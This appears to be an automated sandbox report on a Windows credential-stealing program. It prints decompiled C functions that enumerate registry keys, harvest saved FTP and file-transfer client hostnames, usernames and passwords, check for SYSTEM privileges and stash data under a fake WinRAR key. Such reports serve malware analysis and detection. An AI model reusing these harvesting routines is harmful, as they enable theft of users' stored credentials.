					_t63 = E00401019(E00401019(_t61, _t111, _v4116), _t111, _v4120); // executed
					return _t63;
				}
				_v4112 = 0;
				while(1) {
					_v4108 = 0xfff;
					_t76 = RegEnumKeyExA(_v8, _v4112,  &_v4104,  &_v4108, 0, 0, 0, 0); // executed
					if(_t76 != 0) {
						break;
					}
					_t80 = E00401D15("SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Uninstall", "\\");
					if(_t80 != 0) {
						_t111 = _t80;
						_t83 = E00401D69(_t80,  &_v4104);
						if(_t83 != 0) {
							_v4132 = _t83;
							_t85 = E00401C8E(0x80000002, _v4132, "UninstallString",  &_v4124); // executed
							_t86 = _t85;
							if(_t86 != 0 && _t86 > 1) {
								_push(_t86);
								E0040149B(_v4116, _t86, _v4124); // executed
								_t90 = E00401C8E(0x80000002, _v4132, "DisplayName",  &_v4124); // executed
								_t91 = _t90;
								if(_t91 == 0 || _v4124 <= 1) {
									E0040149B(_v4120,  &_v4104, lstrlenA( &_v4104) + 1);
								} else {
									_push(_t91);
									E0040149B(_v4120,  &_v4104, lstrlenA( &_v4104));
									_t102 = _t91;
									E0040149B(_v4120, _t102, _v4124);
									E004017D5();
								}
								E004017D5();
							}
							E004017D5(_v4132);
						}
					}
					_v4112 = _v4112 + 1;
				}
				RegCloseKey(_v8);
				goto L19;
			}

0x00401fd8
0x00401fea
0x00401ff2
0x00401ff7
0x00401ff7
0x00402008
0x00402010
0x00402015
0x00402015
0x00402026
0x00402032
0x00402045
0x0040204c
0x004021ad
0x004021b5
0x004021c2
0x004021c7
0x004021cd
0x004021ce
0x004021d4
0x004021db
0x004021e8
0x004021f9
0x00402209
0x0040220b
0x00402215
0x0040221b
0x0040221b
0x00402223
0x00402223
0x0040220b
0x00402228
0x0040222e
0x0040222f
0x00402235
0x0040223c
0x00402249
0x00402255
0x0040225a
0x0040226a
0x0040226c
0x00402276
0x0040227c
0x00402284
0x00402284
0x0040226c
0x0040229a
0x004022a2
0x004022a2
0x00402052
0x0040205c
0x0040205c
0x00402085
0x0040208c
0x00000000
0x00000000
0x004020a1
0x004020a3
0x004020a9
0x004020b8
0x004020ba
0x004020c0
0x004020dd
0x004020e2
0x004020e4
0x004020f3
0x00402101
0x0040211d
0x00402122
0x00402124
0x00402185
0x0040212f
0x0040212f
0x0040214b
0x00402150
0x0040215e
0x00402163
0x00402163
0x0040218a
0x0040218a
0x00402195
0x00402195
0x004020ba
0x0040219a
0x0040219a
0x004021a8
0x00000000

APIs

RegOpenKeyA.ADVAPI32(80000002,SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall,00410BE4), ref: 00402045
RegEnumKeyExA.ADVAPI32 ref: 00402085
lstrlenA.KERNEL32(?,00000000,00000000,80000002,?,DisplayName,?,?,00000000,?,00000000,80000002,?,UninstallString,?,00000000), ref: 00402138
lstrlenA.KERNEL32(?,80000002,?,DisplayName,?,?,00000000,?,00000000,80000002,?,UninstallString,?,00000000,?,SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall), ref: 00402171

Part of subcall function 004017D5: LocalFree.KERNEL32(00000000,?,00402BF8), ref: 004017E1

RegCloseKey.ADVAPI32(00410BE4,00410BE4,00000000,?,00000FFF,00000000,00000000,00000000,00000000), ref: 004021A8
GetHGlobalFromStream.OLE32(?,?,?,00000000,?,00000000,?,?,?,?,?,00410BE4), ref: 004021D4
GlobalLock.KERNEL32 ref: 00402204
GlobalUnlock.KERNEL32(?,?,?,?,?,?,?,00000000,?,00000000,?,?,?,?,?,00410BE4), ref: 00402223
GetHGlobalFromStream.OLE32(?,?,?,?,?,00000000,?,00000000,?,?,?,?,?,00410BE4), ref: 00402235
GlobalLock.KERNEL32 ref: 00402265
GlobalUnlock.KERNEL32(?,?,?,?,?,?,?,?,?,00000000,?,00000000,?,?), ref: 00402284

Part of subcall function 004017EC: LocalAlloc.KERNEL32(00000040,-00000080,?,00402BA6,00000000), ref: 004017FA

Strings

UninstallString, xrefs: 004020CD
DisplayName, xrefs: 0040210D
SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall, xrefs: 0040203B, 00402097

Memory Dump Source

Source File: 00000001.00000001.649108673.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: Global$FromLocalLockStreamUnlocklstrlen$AllocCloseEnumFreeOpen
String ID: DisplayName$SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall$UninstallString
API String ID: 4234118056-981893429
Opcode ID: 489e4148b1d345b1835e65092732a2c64f427f3f322f4243a491a90aeeeb77ec
Instruction ID: cdaa908c494aa76102f7c826ddf0691054428348d69886b20b68bb6d83f450db
Opcode Fuzzy Hash: 489e4148b1d345b1835e65092732a2c64f427f3f322f4243a491a90aeeeb77ec
Instruction Fuzzy Hash: AA613E71900158BADB31AB62CD46BEA7679AB04344F0040FBB688F11F1D6BD5EC4AF68

Uniqueness

Uniqueness Score: -1.00%

Function 00402B27, Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 77
stringCOMMON

Download Yara Rule

C-Code - Quality: 76%

			E00402B27(void* __eax, void* __edx) {
				void* _v8;
				long _v12;
				void* _v16;
				CHAR* _v20;
				int _t26;
				int _t32;
				int _t39;
				void* _t42;

				if( *0x41440d != 0 &&  *0x414415 != 0 &&  *0x414419 != 0) {
					_t42 = 0;
					if(OpenProcessToken(GetCurrentProcess(), 8,  &_v8) != 0) {
						_v12 = 0;
						_t26 = GetTokenInformation(_v8, 1, 0, 0,  &_v12); // executed
						if(_t26 == 0 && GetLastError() == 0x7a && _v12 != 0) {
							_v16 = E004017EC(_v12);
							_t32 = GetTokenInformation(_v8, 1, _v16, _v12,  &_v12); // executed
							if(_t32 != 0) {
								_push( &_v20);
								_push( *_v16);
								if( *0x414419() != 0) {
									_t39 = lstrcmpA(_v20, "S-1-5-18"); // executed
									if(_t39 == 0) {
										_t42 = 1;
									}
									LocalFree(_v20);
								}
							}
							E004017D5(_v16);
						}
						CloseHandle(_v8);
					}
					return _t42;
				} else {
					return 0;
				}
			}

0x00402b3b
0x00402b54
0x00402b6a
0x00402b70
0x00402b84
0x00402b8c
0x00402ba6
0x00402bb8
0x00402bc0
0x00402bca
0x00402bcb
0x00402bd4
0x00402bde
0x00402be5
0x00402be7
0x00402be7
0x00402beb
0x00402beb
0x00402bd4
0x00402bf3
0x00402bf3
0x00402bfb
0x00402bfb
0x00402c04
0x00402b4f
0x00402b53
0x00402b53

APIs

GetCurrentProcess.KERNEL32 ref: 00402B56
OpenProcessToken.ADVAPI32(00000000,00000008,00410B87), ref: 00402B62
GetTokenInformation.KERNELBASE(00410B87,00000001(TokenIntegrityLevel),00000000,00000000,00000000), ref: 00402B84
GetLastError.KERNEL32 ref: 00402B8E
GetTokenInformation.KERNELBASE(00410B87,00000001(TokenIntegrityLevel),?,00000000,00000000,00000000), ref: 00402BB8
ConvertSidToStringSidA.ADVAPI32(?,?), ref: 00402BCC
lstrcmpA.KERNEL32(?,S-1-5-18,?,?), ref: 00402BDE
LocalFree.KERNEL32(?,?,S-1-5-18,?,?), ref: 00402BEB
CloseHandle.KERNEL32(00410B87), ref: 00402BFB

Strings

S-1-5-18, xrefs: 00402BD6

Memory Dump Source

Source File: 00000001.00000002.657098932.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: Token$InformationProcess$CloseConvertCurrentErrorFreeHandleLastLocalOpenStringlstrcmp
String ID: S-1-5-18
API String ID: 795010888-4289277601
Opcode ID: 042bba242a62f65dbc0e78402b71d5b6602156a4b029cf2b9444344b761daa0e
Instruction ID: 29f45c5e056208b681b019c64babcbd0cb81e3e7f6b38da6c0e7be3b0a9b4890
Opcode Fuzzy Hash: 042bba242a62f65dbc0e78402b71d5b6602156a4b029cf2b9444344b761daa0e
Instruction Fuzzy Hash: D5218331A10209ABDF119FA4DD8ABEE7775BB40308F148576B110B51E1DBB8AA90DB4C

Uniqueness

Uniqueness Score: -1.00%

Function 004064BB, Relevance: 15.9, APIs: 3, Strings: 6, Instructions: 149
registryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E004064BB(void* __ecx, intOrPtr _a4, char* _a8) {
				void* _v8;
				int _v12;
				int _v16;
				char _v2064;
				intOrPtr _v2068;
				intOrPtr _v2072;
				intOrPtr _v2076;
				int* _v2080;
				intOrPtr _v2084;
				intOrPtr _v2088;
				char _v2092;
				int* _v2096;
				char _v2100;
				char _v2104;
				long _t62;
				long _t63;
				intOrPtr* _t78;
				intOrPtr* _t82;

				_t62 = RegOpenKeyA( *0x4140fe, _a8,  &_v8); // executed
				_t63 = _t62;
				if(_t63 == 0) {
					_v12 = 0;
					while(1) {
						_v16 = 0x7ff;
						if(RegEnumKeyExA(_v8, _v12,  &_v2064,  &_v16, 0, 0, 0, 0) != 0) {
							break;
						}
						_v2068 = E00401D69(E00401D15(_a8, "\\"),  &_v2064);
						_v2080 = E00401C8E( *0x4140fe, _v2068, "Password",  &_v2104);
						_v2072 = E00401C8E( *0x4140fe, _v2068, "Host", 0);
						_v2076 = E00401C8E( *0x4140fe, _v2068, "Login", 0);
						_v2084 = E00401C8E( *0x4140fe, _v2068, "InitialPath", 0);
						_t78 = E00401C8E( *0x4140fe, _v2068, "Port",  &_v2092);
						if(_t78 == 0 || _v2092 != 4) {
							_v2088 = 0x15;
						} else {
							 *_t24 =  *_t78;
						}
						E004017D5(_t78);
						_t82 = E00401C8E( *0x4140fe, _v2068, "PasswordType",  &_v2100);
						if(_t82 == 0 || _v2100 != 4) {
							_v2096 = 0;
						} else {
							 *_t29 =  *_t82;
						}
						E004017D5(_t82);
						if(_v2080 != 0 && _v2096 == 2 && (E004041BC(_v2080,  &_v2104, 0) == 0 || _v2104 == 0)) {
							E004017D5(_v2080);
							_v2080 = 0;
						}
						if(_v2080 != 0 && _v2072 != 0 && _v2076 != 0) {
							E00401486(_a4, 0xbeef0002);
							E004014E8(_a4, _v2072);
							E004014E8(_a4, _v2076);
							E004014BC(_a4, _v2080, _v2104);
							E00401486(_a4, _v2088);
							E004014E8(_a4, _v2084);
						}
						E004017D5(_v2080);
						E004017D5(_v2072);
						E004017D5(_v2076);
						E004017D5(_v2084);
						E004017D5(_v2068);
						_v12 = _v12 + 1;
					}
					return RegCloseKey(_v8);
				}
				return _t63;
			}

0x004064d1
0x004064d6
0x004064d8
0x004064de
0x004064e5
0x004064e5
0x0040650c
0x00000000
0x00000000
0x0040652f
0x00406552
0x00406570
0x0040658e
0x004065ac
0x004065cf
0x004065d1
0x004065e6
0x004065dc
0x004065de
0x004065de
0x004065f1
0x00406613
0x00406615
0x0040662a
0x00406620
0x00406622
0x00406622
0x00406635
0x00406641
0x00406673
0x00406678
0x00406678
0x00406689
0x004066a5
0x004066b3
0x004066c1
0x004066d5
0x004066e3
0x004066f1
0x004066f1
0x004066fc
0x00406707
0x00406712
0x0040671d
0x00406728
0x0040672d
0x0040672d
0x00000000
0x00406738
0x0040673e

APIs

RegOpenKeyA.ADVAPI32(?,?), ref: 004064D1
RegEnumKeyExA.ADVAPI32 ref: 00406505
RegCloseKey.ADVAPI32(?,?,00000000,?,?,00000000,00000000,00000000,00000000,?,?), ref: 00406738

Strings

Port, xrefs: 004065B9
Login, xrefs: 00406578
Password, xrefs: 0040653C
InitialPath, xrefs: 00406596
Host, xrefs: 0040655A
PasswordType, xrefs: 004065FD

Memory Dump Source

Source File: 00000001.00000001.649108673.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: CloseEnumOpen
String ID: Host$InitialPath$Login$Password$PasswordType$Port
API String ID: 1332880857-4069465341
Opcode ID: 4a6e00349b4c491ccb1d757ba87342954c5663798b67ca1a12abe626d30f0c31
Instruction ID: 8a8b12953b7785bcc2616ac66f0380b51c334fa7c9da36678472f7619d2a13f1
Opcode Fuzzy Hash: 4a6e00349b4c491ccb1d757ba87342954c5663798b67ca1a12abe626d30f0c31
Instruction Fuzzy Hash: 8F51F43194012CEADF226B52CC42BD9BAB9BF04704F14C0BAA549750B1DB7A4EA1DFD8

Uniqueness

Uniqueness Score: -1.00%

Function 0040D0D7, Relevance: 15.9, APIs: 3, Strings: 6, Instructions: 147
registryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0040D0D7(void* __ecx, intOrPtr _a4, void* _a8, char* _a12) {
				void* _v8;
				int _v12;
				char _v16;
				int _v20;
				char _v2068;
				intOrPtr _v2072;
				intOrPtr _v2076;
				intOrPtr _v2080;
				intOrPtr _v2084;
				intOrPtr _v2088;
				intOrPtr _v2092;
				char _v2096;
				intOrPtr _v2100;
				long _t68;
				long _t69;
				intOrPtr* _t84;
				void* _t108;

				_t108 = __ecx;
				_t68 = RegOpenKeyA(_a8, _a12,  &_v8); // executed
				_t69 = _t68;
				if(_t69 == 0) {
					_v12 = 0;
					while(1) {
						_v20 = 0x7ff;
						if(RegEnumKeyExA(_v8, _v12,  &_v2068,  &_v20, 0, 0, 0, 0) != 0) {
							break;
						}
						_v2072 = E00401D15(E00401D15(_a12, "\\"),  &_v2068);
						E004017D5(_t74);
						_v2092 = E00401C8E(_a8, _v2072, "Password",  &_v16);
						_v2076 = E00401C8E(_a8, _v2072, "ServerName", 0);
						_v2080 = E00401C8E(_a8, _v2072, "UserID", 0);
						_t84 = E00401C8E(_a8, _v2072, "PortNumber",  &_v2096);
						if(_t84 == 0 || _v2096 != 4) {
							_t85 = _t84;
							if(_t84 != 0) {
								E004017D5(_t85);
							}
							_v2084 = 0x15;
						} else {
							 *_t27 =  *_t84;
							E004017D5(_t84);
						}
						_v2088 = E00401C8E(_a8, _v2072, "InitialDirectory", 0);
						_v2100 = E00401C8E(_a8, _v2072, "ServerType", 0);
						if(_v2092 != 0 && E004041BC(_v2092,  &_v16, 0x41603f) != 0 && _v16 != 0 && _v2080 != 0 && _v2076 != 0) {
							E00401486(_a4, 0xbeef0010);
							E004014E8(_a4, _v2076);
							E004014E8(_a4, _v2080);
							E004014BC(_a4, _v2092, _v16);
							E00401486(_a4, _v2084);
							E004014E8(_a4, _v2088);
							E004014E8(_a4, _v2100);
						}
						E004017D5(_v2092);
						E004017D5(_v2076);
						E004017D5(_v2088);
						E004017D5(_v2080);
						E004017D5(_v2100);
						E0040D0D7(_t108, _a4, _a8, _v2072);
						E004017D5(_v2072);
						_v12 = _v12 + 1;
					}
					return RegCloseKey(_v8);
				}
				return _t69;
			}

0x0040d0d7
0x0040d0ea
0x0040d0ef
0x0040d0f1
0x0040d0f7
0x0040d0fe
0x0040d0fe
0x0040d125
0x00000000
0x00000000
0x0040d149
0x0040d14f
0x0040d16b
0x0040d186
0x0040d1a1
0x0040d1c1
0x0040d1c3
0x0040d1de
0x0040d1e0
0x0040d1e3
0x0040d1e3
0x0040d1e8
0x0040d1ce
0x0040d1d0
0x0040d1d7
0x0040d1d7
0x0040d207
0x0040d222
0x0040d22f
0x0040d26d
0x0040d27b
0x0040d289
0x0040d29a
0x0040d2a8
0x0040d2b6
0x0040d2c4
0x0040d2c4
0x0040d2cf
0x0040d2da
0x0040d2e5
0x0040d2f0
0x0040d2fb
0x0040d30c
0x0040d317
0x0040d31c
0x0040d31c
0x00000000
0x0040d327
0x0040d32d

APIs

RegOpenKeyA.ADVAPI32(?,?,?), ref: 0040D0EA
RegEnumKeyExA.ADVAPI32 ref: 0040D11E
RegCloseKey.ADVAPI32(?,?,00000000,?,?,00000000,00000000,00000000,00000000,?,?,?), ref: 0040D327

Strings

ServerName, xrefs: 0040D173
InitialDirectory, xrefs: 0040D1F4
UserID, xrefs: 0040D18E
Password, xrefs: 0040D158
ServerType, xrefs: 0040D20F
PortNumber, xrefs: 0040D1AE

Memory Dump Source

Source File: 00000001.00000001.649108673.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: CloseEnumOpen
String ID: InitialDirectory$Password$PortNumber$ServerName$ServerType$UserID
API String ID: 1332880857-2649023343
Opcode ID: 60e72379dc5ff5237a2f394d070ac9166667d84441a53791c4176c62217b7b40
Instruction ID: f38a5596ae9a773ac0d22796df066d347c720fe0787782128e341da31621acfc
Opcode Fuzzy Hash: 60e72379dc5ff5237a2f394d070ac9166667d84441a53791c4176c62217b7b40
Instruction Fuzzy Hash: 5851B43194011CBADF226F91CC42BDD7AB9BF08314F14C0BAB548750B1DF7A9A95AF98

Uniqueness

Uniqueness Score: -1.00%

Function 004079E2, Relevance: 15.9, APIs: 3, Strings: 6, Instructions: 146
registryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E004079E2(intOrPtr _a4, void* _a8, char* _a12) {
				void* _v8;
				int _v12;
				int _v16;
				char _v2064;
				intOrPtr _v2068;
				intOrPtr _v2072;
				intOrPtr _v2076;
				intOrPtr _v2080;
				char _v2084;
				intOrPtr _v2088;
				intOrPtr _v2092;
				intOrPtr* _v2096;
				char _v2100;
				long _t66;
				long _t67;
				intOrPtr* _t82;

				_t66 = RegOpenKeyA(_a8, _a12,  &_v8); // executed
				_t67 = _t66;
				if(_t67 == 0) {
					_v12 = 0;
					while(1) {
						_v16 = 0x7ff;
						if(RegEnumKeyExA(_v8, _v12,  &_v2064,  &_v16, 0, 0, 0, 0) != 0) {
							break;
						}
						_v2068 = E00401D15(E00401D15(_a12, "\\"),  &_v2064);
						E004017D5(_t72);
						_v2080 = E00401C8E(_a8, _v2068, "Password", 0);
						_v2072 = E00401C8E(_a8, _v2068, "HostName", 0);
						_v2076 = E00401C8E(_a8, _v2068, "UserName", 0);
						_v2088 = E00401C8E(_a8, _v2068, "RemoteDirectory", 0);
						_t82 = E00401C8E( *0x4140fe, _v2068, "PortNumber",  &_v2084);
						if(_t82 == 0 || _v2084 != 4) {
							_t83 = _t82;
							if(_t82 != 0) {
								E004017D5(_t83);
							}
							_v2092 = 0x15;
						} else {
							 *_t28 =  *_t82;
							E004017D5(_t82);
						}
						_v2096 = E00401C8E(_a8, _v2068, "FSProtocol",  &_v2100);
						if(_v2080 != 0 && _v2072 != 0 && _v2076 != 0) {
							E00401486(_a4, 0xbeef0010);
							E004014E8(_a4, _v2072);
							E004014E8(_a4, _v2076);
							E004014E8(_a4, _v2080);
							E00401486(_a4, _v2092);
							E004014E8(_a4, _v2088);
							if(_v2096 == 0 || _v2100 != 4) {
								E00401486(_a4, 0);
							} else {
								E00401486(_a4,  *_v2096);
							}
						}
						E004017D5(_v2080);
						E004017D5(_v2072);
						E004017D5(_v2076);
						E004017D5(_v2088);
						E004017D5(_v2096);
						E004079E2(_a4, _a8, _v2068);
						E004017D5(_v2068);
						_v12 = _v12 + 1;
					}
					return RegCloseKey(_v8);
				}
				return _t67;
			}

0x004079f5
0x004079fa
0x004079fc
0x00407a02
0x00407a09
0x00407a09
0x00407a30
0x00000000
0x00000000
0x00407a54
0x00407a5a
0x00407a74
0x00407a8f
0x00407aaa
0x00407ac5
0x00407ae8
0x00407aea
0x00407b05
0x00407b07
0x00407b0a
0x00407b0a
0x00407b0f
0x00407af5
0x00407af7
0x00407afe
0x00407afe
0x00407b33
0x00407b40
0x00407b68
0x00407b76
0x00407b84
0x00407b92
0x00407ba0
0x00407bae
0x00407bba
0x00407bdc
0x00407bc5
0x00407bd0
0x00407bd0
0x00407bba
0x00407be7
0x00407bf2
0x00407bfd
0x00407c08
0x00407c13
0x00407c24
0x00407c2f
0x00407c34
0x00407c34
0x00000000
0x00407c3f
0x00407c45

APIs

RegOpenKeyA.ADVAPI32(?,?,?), ref: 004079F5
RegEnumKeyExA.ADVAPI32 ref: 00407A29
RegCloseKey.ADVAPI32(?,?,00000000,?,000007FF,00000000,00000000,00000000,00000000,?,?,?), ref: 00407C3F

Strings

RemoteDirectory, xrefs: 00407AB2
FSProtocol, xrefs: 00407B20
Password, xrefs: 00407A61
UserName, xrefs: 00407A97
HostName, xrefs: 00407A7C
PortNumber, xrefs: 00407AD2

Memory Dump Source

Source File: 00000001.00000001.649108673.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: CloseEnumOpen
String ID: FSProtocol$HostName$Password$PortNumber$RemoteDirectory$UserName
API String ID: 1332880857-3874328862
Opcode ID: 6aa040c6243baa02be8ddd97ebc68938d5727426411d611ec7b4e87c45dd2e9e
Instruction ID: fd264f026befac884e31df10338c99dd76bd249b7adf4ed45f8ce47fce3a56bd
Opcode Fuzzy Hash: 6aa040c6243baa02be8ddd97ebc68938d5727426411d611ec7b4e87c45dd2e9e
Instruction Fuzzy Hash: 3451E73194411CEADF22AF61CC42BDD7AB5BF04308F10C0BAB548751B1DB7AAA919F99

Uniqueness

Uniqueness Score: -1.00%

Function 0040DCC7, Relevance: 15.9, APIs: 3, Strings: 6, Instructions: 133
registryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0040DCC7(void* _a4, char* _a8, intOrPtr _a12) {
				void* _v8;
				int _v12;
				int _v16;
				char _v2064;
				intOrPtr _v2068;
				intOrPtr _v2072;
				intOrPtr _v2076;
				intOrPtr _v2080;
				intOrPtr _v2084;
				char _v2088;
				char* _v2092;
				intOrPtr _v2096;
				char _v2100;
				long _t67;
				long _t68;

				_t67 = RegOpenKeyA(_a4, _a8,  &_v8); // executed
				_t68 = _t67;
				if(_t68 == 0) {
					_v12 = 0;
					while(1) {
						_v16 = 0x7ff;
						if(RegEnumKeyExA(_v8, _v12,  &_v2064,  &_v16, 0, 0, 0, 0) != 0) {
							break;
						}
						_v2092 = E00401D15(E00401D15(_a8, "\\"),  &_v2064);
						E004017D5(_t73);
						_v2068 = E00401C8E(_a4, _v2092, "FTP destination server", 0);
						_v2072 = E00401C8E(_a4, _v2092, "FTP destination user", 0);
						_v2076 = E00401C8E(_a4, _v2092, "FTP destination password", 0);
						_v2080 = E00401C8E(_a4, _v2092, "FTP destination port",  &_v2088);
						_v2084 = E00401C8E(_a4, _v2092, "FTP destination catalog", 0);
						_v2096 = E00401C8E(_a4, _v2092, "FTP profiles",  &_v2100);
						if(_v2068 != 0 && _v2072 != 0 && _v2076 != 0) {
							E00401486(_a12, 0xbeef0000);
							E004014E8(_a12, _v2068);
							E004014E8(_a12, _v2072);
							E004014E8(_a12, _v2076);
							E004014BC(_a12, _v2080, _v2088);
							E004014E8(_a12, _v2084);
						}
						if(_v2100 != 0) {
							E00401486(_a12, 0xbeef0001);
							E004014BC(_a12, _v2096, _v2100);
						}
						E0040DCC7(_a4, _v2092, _a12);
						E004017D5(_v2092);
						E004017D5(_v2068);
						E004017D5(_v2072);
						E004017D5(_v2076);
						E004017D5(_v2080);
						E004017D5(_v2084);
						E004017D5(_v2096);
						_v12 = _v12 + 1;
					}
					return RegCloseKey(_v8);
				}
				return _t68;
			}

0x0040dcda
0x0040dcdf
0x0040dce1
0x0040dce7
0x0040dcee
0x0040dcee
0x0040dd15
0x00000000
0x00000000
0x0040dd39
0x0040dd3f
0x0040dd59
0x0040dd74
0x0040dd8f
0x0040ddaf
0x0040ddca
0x0040ddea
0x0040ddf7
0x0040de13
0x0040de21
0x0040de2f
0x0040de3d
0x0040de51
0x0040de5f
0x0040de5f
0x0040de6b
0x0040de75
0x0040de89
0x0040de89
0x0040de9a
0x0040dea5
0x0040deb0
0x0040debb
0x0040dec6
0x0040ded1
0x0040dedc
0x0040dee7
0x0040deec
0x0040deec
0x00000000
0x0040def7
0x0040defd

APIs

RegOpenKeyA.ADVAPI32(?,?,?), ref: 0040DCDA
RegEnumKeyExA.ADVAPI32 ref: 0040DD0E
RegCloseKey.ADVAPI32(?,?,00000000,?,000007FF,00000000,00000000,00000000,00000000,?,?,?), ref: 0040DEF7

Strings

FTP profiles, xrefs: 0040DDD7
FTP destination server, xrefs: 0040DD46
FTP destination catalog, xrefs: 0040DDB7
FTP destination password, xrefs: 0040DD7C
FTP destination port, xrefs: 0040DD9C
FTP destination user, xrefs: 0040DD61

Memory Dump Source

Source File: 00000001.00000001.649108673.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: CloseEnumOpen
String ID: FTP destination catalog$FTP destination password$FTP destination port$FTP destination server$FTP destination user$FTP profiles
API String ID: 1332880857-3620412361
Opcode ID: 132459a5dfa4ee88dd816024efc9ae046a1fc0875c057f1f5066dc3d87b767b1
Instruction ID: c7e1c623c9d0911d9fb61fdd086df822930df8ad3d0878dbfe468f7a3020db9c
Opcode Fuzzy Hash: 132459a5dfa4ee88dd816024efc9ae046a1fc0875c057f1f5066dc3d87b767b1
Instruction Fuzzy Hash: 2F51743194011CBADF226F91CC42BDD7AB6BF04304F1080BAB548751B1DF7A9AA5AFD8

Uniqueness

Uniqueness Score: -1.00%

Function 00407D34, Relevance: 15.9, APIs: 3, Strings: 6, Instructions: 126
registryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00407D34(intOrPtr _a4, void* _a8, char* _a12) {
				void* _v8;
				int _v12;
				int _v16;
				char _v2064;
				intOrPtr _v2068;
				intOrPtr _v2072;
				intOrPtr _v2076;
				intOrPtr _v2080;
				char _v2084;
				intOrPtr _v2088;
				intOrPtr _v2092;
				intOrPtr _v2096;
				long _t63;
				long _t64;

				_t63 = RegOpenKeyA(_a8, _a12,  &_v8); // executed
				_t64 = _t63;
				if(_t64 == 0) {
					_v12 = 0;
					while(1) {
						_v16 = 0x7ff;
						if(RegEnumKeyExA(_v8, _v12,  &_v2064,  &_v16, 0, 0, 0, 0) != 0) {
							break;
						}
						_v2068 = E00401D15(E00401D15(_a12, "\\"),  &_v2064);
						E004017D5(_t69);
						_v2080 = E00401C8E(_a8, _v2068, "PassWord",  &_v2084);
						_v2072 = E00401C8E(_a8, _v2068, "Url", 0);
						_v2076 = E00401C8E(_a8, _v2068, "UserName", 0);
						_v2088 = E00401C8E(_a8, _v2068, "RootDirectory", 0);
						_v2092 = E00401C8E(_a8, _v2068, "Port", 0);
						_v2096 = E00401C8E(_a8, _v2068, "ServerType", 0);
						if(_v2080 != 0 && _v2072 != 0 && _v2076 != 0) {
							E00401486(_a4, 0xbeef0010);
							E004014E8(_a4, _v2072);
							E004014E8(_a4, _v2076);
							E004014BC(_a4, _v2080, _v2084);
							E004014E8(_a4, _v2092);
							E004014E8(_a4, _v2088);
							E004014E8(_a4, _v2096);
						}
						E004017D5(_v2080);
						E004017D5(_v2072);
						E004017D5(_v2076);
						E004017D5(_v2088);
						E004017D5(_v2092);
						E004017D5(_v2096);
						E00407D34(_a4, _a8, _v2068);
						E004017D5(_v2068);
						_v12 = _v12 + 1;
					}
					return RegCloseKey(_v8);
				}
				return _t64;
			}

0x00407d47
0x00407d4c
0x00407d4e
0x00407d54
0x00407d5b
0x00407d5b
0x00407d82
0x00000000
0x00000000
0x00407da6
0x00407dac
0x00407dcb
0x00407de6
0x00407e01
0x00407e1c
0x00407e37
0x00407e52
0x00407e5f
0x00407e7b
0x00407e89
0x00407e97
0x00407eab
0x00407eb9
0x00407ec7
0x00407ed5
0x00407ed5
0x00407ee0
0x00407eeb
0x00407ef6
0x00407f01
0x00407f0c
0x00407f17
0x00407f28
0x00407f33
0x00407f38
0x00407f38
0x00000000
0x00407f43
0x00407f49

APIs

RegOpenKeyA.ADVAPI32(?,?,?), ref: 00407D47
RegEnumKeyExA.ADVAPI32 ref: 00407D7B
RegCloseKey.ADVAPI32(?,?,00000000,?,000007FF,00000000,00000000,00000000,00000000,?,?,?), ref: 00407F43

Strings

Port, xrefs: 00407E24
Url, xrefs: 00407DD3
RootDirectory, xrefs: 00407E09
UserName, xrefs: 00407DEE
ServerType, xrefs: 00407E3F
PassWord, xrefs: 00407DB8

Memory Dump Source

Source File: 00000001.00000001.649108673.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: CloseEnumOpen
String ID: PassWord$Port$RootDirectory$ServerType$Url$UserName
API String ID: 1332880857-2128033141
Opcode ID: fc8c4e02fa1479332a51c4a1468e6b433027faf32cb97c2702db40d0a608d150
Instruction ID: 4eb3fcfc5343b041dd0bd68344c2513e02b84b383dc5ec38f59f6f48277349fc
Opcode Fuzzy Hash: fc8c4e02fa1479332a51c4a1468e6b433027faf32cb97c2702db40d0a608d150
Instruction Fuzzy Hash: 6251723194011CBADF226F61CC42BED7AB6BF04304F14C0BAB558750B1DB7A5EA1AF99

Uniqueness

Uniqueness Score: -1.00%

Function 0040260B, Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 84
registryfileCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0040260B(char* _a4, char* _a8, int _a12) {
				void* _v8;
				void* _v12;
				char _v273;
				CHAR* _v280;
				long _t24;
				long _t29;
				CHAR* _t36;
				void* _t37;
				long _t45;
				void* _t48;
				void* _t49;

				_t48 = 0;
				_t24 = RegCreateKeyA( *0x4140fe, "Software\\WinRAR",  &_v8); // executed
				if(_t24 == 0) {
					_t45 = RegSetValueExA(_v8, _a4, 0, 3, _a8, _a12); // executed
					if(_t45 == 0) {
						_t48 = 1;
					}
					RegCloseKey(_v8); // executed
				}
				_t49 = _t48;
				if(_t49 == 0) {
					_t29 = GetTempPathA(0x104,  &_v273);
					if(_t29 != 0 && _t29 <= 0x104) {
						CreateDirectoryA( &_v273, 0);
						if(E004024D7( &_v273) != 0) {
							_t36 = E00401D15( &_v273, _a4);
						} else {
							_t36 = E00401D69(E00401D15( &_v273, "\\"), _a4);
						}
						_v280 = _t36;
						_t37 = CreateFileA(_v280, 0xc0000000, 3, 0, 2, 0, 0);
						_v12 = _t37;
						if(_t37 + 1 != 0) {
							_t49 = E004013C2(_v12, _a8, _a12);
							CloseHandle(_v12);
						}
						_t49 = _t49;
						if(_t49 == 0) {
							DeleteFileA(_v280);
						}
						E004017D5(_v280);
					}
				}
				return _t49;
			}

